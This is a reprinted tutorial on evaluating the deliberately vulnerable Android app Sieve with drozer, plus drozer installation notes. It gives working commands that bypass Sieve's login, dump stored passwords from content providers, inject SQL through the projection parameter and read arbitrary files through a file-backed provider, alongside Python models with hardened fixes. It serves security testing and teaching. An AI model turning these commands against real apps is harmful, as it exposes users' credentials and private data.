Use Drozer to evaluate the app (reprint)

Source: Internet
Author: User
Tags: SQL injection, SQLite, database

Test examples for security evaluation of Android applications using Drozer

After reading the Drozer user documentation I tried it on several Android apps and found that they had essentially no problems, so I practised on Sieve, the deliberately vulnerable app provided with drozer. The steps for installing it and carrying out the evaluation are roughly the headings below.

1 Installing Sieve on an Android device

Sieve is a password-manager app that deliberately exhibits a number of common Android app flaws, so it is a good target for practising drozer. Download sieve.apk from https://www.mwrinfosecurity.com/system/assets/380/original/sieve.apk, start the emulator and install it:

adb install sieve.apk

Then set Sieve up: on first launch it asks you to choose the password and PIN that will be needed to open the app afterwards. Add a few account/password entries for it to manage.

Further options are available under Settings:

2 Get app package info

The function of each drozer module is shown below.

The modules that retrieve app package information live under app.package.*:

2.1 Get the package names of all apps installed on the device

The command is:

run app.package.list

This lists every installed package. To find a specific app, add -f [keyword]; for example, to find Sieve's package name on the device:

run app.package.list -f sieve

Note: when typing a command you can press Tab to complete a package name such as com.mwr.example.sieve instead of having to remember it.

2.2 Get some basic information on Sieve

The command is:

run app.package.info -a com.mwr.example.sieve

The output shows Sieve's version, the directory where its data is stored, its user ID and group ID, whether it uses any shared libraries, and the permissions it uses and defines.

2.3 Identify the attack surface

This tutorial concentrates on weaknesses in Android's IPC mechanisms that let an app leak sensitive information to other apps on the same device. The command that lists the components making up the attack surface is:

run app.package.attacksurface com.mwr.example.sieve

The result counts the potentially usable components: exported activities, broadcast receivers, content providers and services. "Exported" means the component can be invoked by other apps on the device. If the output also says "is debuggable", the app is marked debuggable and we can attach a debugger to its process through adb.

2.4 Get further information on the attack surface

The command for more detail on the activities that form the attack surface is:

run app.activity.info -a com.mwr.example.sieve

MainLoginActivity is the screen shown when the app starts, so it has to be exported; the other two activities should, in theory, not be exported at all.

2.5 Start activities

PWList and FileSelectActivity are exported and require no permission, so we can start them directly from drozer. PWList (the password list) looks like the richer target, so start it with:

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Once started, PWList displays the stored password list, bypassing the login screen:

Usage of app.activity.start:

help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]] [--component PACKAGE COMPONENT] [--data-uri DATA_URI] [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]] [--mimetype MIMETYPE]

Starts an Activity using the formulated intent.

2.6 Getting information from content providers

Following on from section 2.3, the command for more detail on the content providers' attack surface is:

run app.provider.info -a com.mwr.example.sieve

This shows the details of the two exported content providers counted in section 2.3, including their names, permissions and paths.

2.6.1 Find URIs that can access content providers (data leaks)

From the previous section we can guess that DBContentProvider is backed by a database of some kind, but we do not know how the data is organised. A content URI has the form content://<authority>/<path>, so we can construct partial content URIs to probe DBContentProvider. One path, /Keys, is protected by the READ_KEYS and WRITE_KEYS permissions for reading and writing.

drozer's scanner module offers a way to guess which content URIs might exist:

run scanner.provider.finduris -a com.mwr.example.sieve

Once it has found URIs that return content, we can use other drozer modules against those URIs to read and even modify the data. For example:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

This returns each entry's username, email address and password, the latter shown as a Base64-encoded string.

2.6.2 SQL injection

Android recommends SQLite for storing user data. SQLite is driven by SQL statements, so SQL injection is possible: through the projection and selection parameters of a query we can pass simple injection payloads to the content provider. For example:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

After both commands the device returns a very detailed error message, which reveals how the query is assembled.

Use SQL injection to list all tables in the database:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Use SQL injection to dump the contents of a table:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
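To see why those projection payloads work, here is an added example (not Sieve's or drozer's code) that models the vulnerable provider in Python with the standard sqlite3 module. The "Passwords" and "Key" tables and their rows are constructed for this example, and build_query() stands in for Android's SQLiteQueryBuilder, which concatenates the caller's projection and selection into "SELECT <projection> FROM <table> WHERE <selection>". The hardened variant shows the fix: restrict the projection to a known column list and bind selection values as parameters.

```python
"""Model of SQL injection through a content provider's query() method.

Added example, not code from Sieve or drozer. An in-memory SQLite database with
constructed "Passwords" and "Key" tables stands in for Sieve's database.db, and
build_query() reproduces the concatenation Android's SQLiteQueryBuilder performs
when a provider forwards the caller's projection and selection unchanged.
"""
import sqlite3

# Constructed sample data; the real Sieve schema differs in detail.
SCHEMA = """
CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                        password BLOB, email TEXT);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', X'41424344', 'alice@example.com');
INSERT INTO Key VALUES ('Thisismylongpassword', '1234');
"""


def open_db():
    """Create the in-memory database standing in for Sieve's store."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query(table, projection, selection=None):
    """Mimic SQLiteQueryBuilder: SELECT <projection> FROM <table> [WHERE <selection>]."""
    sql = "SELECT " + ", ".join(projection) + " FROM " + table
    if selection:
        sql += " WHERE " + selection
    return sql


def vulnerable_query(conn, projection, selection=None):
    """Provider query() that trusts the caller's projection and selection."""
    return conn.execute(build_query("Passwords", projection, selection)).fetchall()


ALLOWED_COLUMNS = ("_id", "service", "username", "password", "email")


def hardened_query(conn, projection, service=None):
    """Allow-list the projection and bind the selection value as a parameter."""
    for col in projection:
        if col not in ALLOWED_COLUMNS:
            raise ValueError("column not permitted: %r" % col)
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    params = ()
    if service is not None:
        sql += " WHERE service = ?"
        params = (service,)
    return conn.execute(sql, params).fetchall()


def error_leak(conn):
    """--projection "'" : the unbalanced quote makes SQLite report a parse error."""
    try:
        vulnerable_query(conn, ["'"])
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def list_tables_via_injection(conn):
    """--projection "* FROM SQLITE_MASTER WHERE type='table';--" lists the tables."""
    rows = vulnerable_query(conn, ["* FROM SQLITE_MASTER WHERE type='table';--"])
    return sorted(row[1] for row in rows)  # column 1 of sqlite_master is the name


def dump_key_table_via_injection(conn):
    """--projection "* FROM Key;--" reads the master password and PIN."""
    return vulnerable_query(conn, ["* FROM Key;--"])


if __name__ == "__main__":
    db = open_db()
    print("error message:", error_leak(db))
    print("query built:", build_query("Passwords", ["* FROM Key;--"]))
    print("tables:", list_tables_via_injection(db))
    print("Key table:", dump_key_table_via_injection(db))
    try:
        hardened_query(db, ["* FROM Key;--"])
    except ValueError as exc:
        print("hardened provider rejected payload:", exc)
```

Running it prints the SQLite error text for the unbalanced quote, the statement that the "* FROM Key;--" payload turns into (the original FROM clause ends up behind the comment marker), the table names recovered through sqlite_master, and the Key table's contents; the hardened query rejects the same payload before it ever reaches SQLite. On Android the equivalent fixes are SQLiteQueryBuilder.setProjectionMap() or setStrict() together with selectionArgs.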

2.6.3 Getting information from file-system-backed content providers

A file-system-backed content provider gives access to the underlying file system. The Android sandbox normally prevents one app from reading another's files, and this kind of provider is how apps share files. For Sieve we can infer that FileBackupProvider is a file-system-backed content provider. drozer's app.provider.read module reads a file through it:

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

Files can also be downloaded with app.provider.download:

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
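As an added example (not Sieve's or drozer's own code), the following Python models the openFile() logic of a file-backed provider and shows why reading /etc/hosts through FileBackupProvider succeeds: the path component of the content URI is used as a file path unchanged. A temporary directory with constructed files stands in for the device file system, and the hardened version shows the usual fix of resolving the requested path and checking that it stays under the directory the provider is meant to serve.

```python
"""Model of a file-system-backed content provider's openFile().

Added example, not Sieve's or drozer's code. The provider is meant to serve one
backup directory, but the vulnerable version hands the URI path to the file
system unchanged, so any file the caller names is read. The hardened version
canonicalises the path and refuses anything outside the allowed directory.
"""
import os
import tempfile

AUTHORITY = "content://com.mwr.example.sieve.FileBackupProvider"


def provider_path(content_uri):
    """Return the path of content://<authority>/<path>, as Uri.getPath() would."""
    prefix = "content://"
    if not content_uri.startswith(prefix):
        raise ValueError("not a content URI: %r" % content_uri)
    rest = content_uri[len(prefix):]
    slash = rest.find("/")
    return rest[slash:] if slash != -1 else "/"


def open_file_vulnerable(content_uri):
    """Sieve-style: the URI path is opened directly, with no restriction at all."""
    with open(provider_path(content_uri), "rb") as fh:
        return fh.read()


def open_file_hardened(content_uri, backup_dir):
    """Serve only files whose canonical location is inside backup_dir."""
    root = os.path.realpath(backup_dir)
    relative = provider_path(content_uri).lstrip("/")
    requested = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, requested]) != root:
        raise PermissionError("path escapes backup directory: " + requested)
    with open(requested, "rb") as fh:
        return fh.read()


def demo():
    """Build a constructed sandbox and run the drozer-style reads against both versions."""
    base = tempfile.mkdtemp()
    backup = os.path.join(base, "app", "files", "backup")
    os.makedirs(backup)
    with open(os.path.join(backup, "export.txt"), "wb") as fh:
        fh.write(b"intended backup data")
    # Constructed stand-in for /data/data/com.mwr.example.sieve/databases/database.db
    secret = os.path.join(base, "databases", "database.db")
    os.makedirs(os.path.dirname(secret))
    with open(secret, "wb") as fh:
        fh.write(b"SQLite format 3")

    results = {}
    # 1. Vulnerable provider: an absolute path in the URI reads the file off disk.
    results["leak"] = open_file_vulnerable(AUTHORITY + secret)
    # 2. Hardened provider: the legitimate backup file is still served...
    results["legit"] = open_file_hardened(AUTHORITY + "/export.txt", backup)
    # 3. ...but a traversal out of the backup directory is refused.
    try:
        open_file_hardened(AUTHORITY + "/../../../databases/database.db", backup)
        results["traversal"] = "allowed"
    except PermissionError:
        results["traversal"] = "blocked"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The same check is what scanner.provider.traversal (section 2.6.4) probes for from the outside: if a provider canonicalises and confines paths as open_file_hardened does, the "../" and absolute-path requests the scanner sends come back empty or denied.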

2.6.4 Checking content providers for vulnerabilities

Check for SQL injection:

run scanner.provider.injection -a com.mwr.example.sieve

Check for directory traversal:

run scanner.provider.traversal -a com.mwr.example.sieve

Summary of experience: I think that after gathering the package's basic information, the scanner modules should be run first to find vulnerabilities or points of interest, and the next steps planned from there.

2.7 Interacting with services

The command to list the exported services is:

run app.service.info -a com.mwr.example.sieve

About the service modules:

To send a message to a service:

run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 1 5 3

Result returned:

I do not understand why this is returned; perhaps the number of arguments is not sufficient. Note that --msg only sets the Message's what, arg1 and arg2; any data the service expects arrives in a Bundle passed with --extra TYPE KEY VALUE, so a message without the extras the service looks for is unlikely to produce a meaningful reply.

2.8 Other common modules
    • shell.start: open an interactive Linux shell on the Android device
    • tools.file.upload / tools.file.download: upload files to and download files from the device
    • tools.setup.busybox / tools.setup.minimalsu: install BusyBox or minimal-su on the device
Installing and using the Drozer tools on Ubuntu 14.04

July 22, 2014

Introduction to installing and using the Drozer tools on Ubuntu 14.04

1. Drozer tools

(omitted)

2. Installing the tools

2.1 Prerequisites

Make sure the PC has the following installed:

    • JRE or JDK
    • Android SDK

On 64-bit Ubuntu 14.04, ia32-libs also needs to be installed. Make sure that adb and java are on the system PATH.

2.2 Installing Drozer on Ubuntu

It can be downloaded from the official site, https://www.mwrinfosecurity.com/products/drozer/community-edition/. The .deb package installs directly; alternatively you can download the .egg Python package, which requires you to download and install the protobuf and twisted packages manually. I installed the .deb package directly.

2.3 Install the agent (agent.apk) on the phone or emulator

Download agent.apk and install it with:

adb install agent.apk

3 Using Drozer

3.1 Connect the drozer console to the drozer agent and open a session

Step 1: set up port forwarding. drozer uses TCP port 31415 by default; the following command forwards everything sent to TCP port 31415 on the Ubuntu host to port 31415 on the phone:

adb forward tcp:31415 tcp:31415

Step 2: start the agent server on the Android device. In the agent app, select "Embedded Server" and then "Enable" to turn the server on.

Step 3: connect the drozer console to the agent server by entering the following in an Ubuntu terminal:

drozer console connect

The console opens as follows:

3.2 drozer console commands

The drozer console is a command-line environment similar to a bash shell. It provides a range of modules for assessing the security of Android devices, each with a clearly defined function. The command descriptions below are my translation of the official documentation and may not be entirely accurate:

Command        Description                                                                  Notes
run MODULE     Run a drozer module
list or ls     Show all drozer modules that can be run in the current session              Modules you lack permission to run are hidden
shell          Open an interactive Linux shell on the device, in the context of the agent process
cd             Change into the given module namespace                                      Saves typing the full module name each time
clean          Remove temporary files that drozer has stored on the device
contributors   List the people who have contributed to the drozer framework
echo           Print text to the console
exit           End the drozer session
help           Show help for a command or module
load           Load a file containing a series of drozer commands and run them in sequence
module         Find and install drozer extension modules from the Internet
permissions    Show the permissions granted to the drozer agent
set            Store a value in a variable, usable like an environment variable            e.g. set host=193.168.1.1
unset          Remove a variable assignment                                                ......

First use list to show all the modules, then use cd to enter the scanner module namespace, and then try the set, echo and unset commands.

The command description from the official documentation:
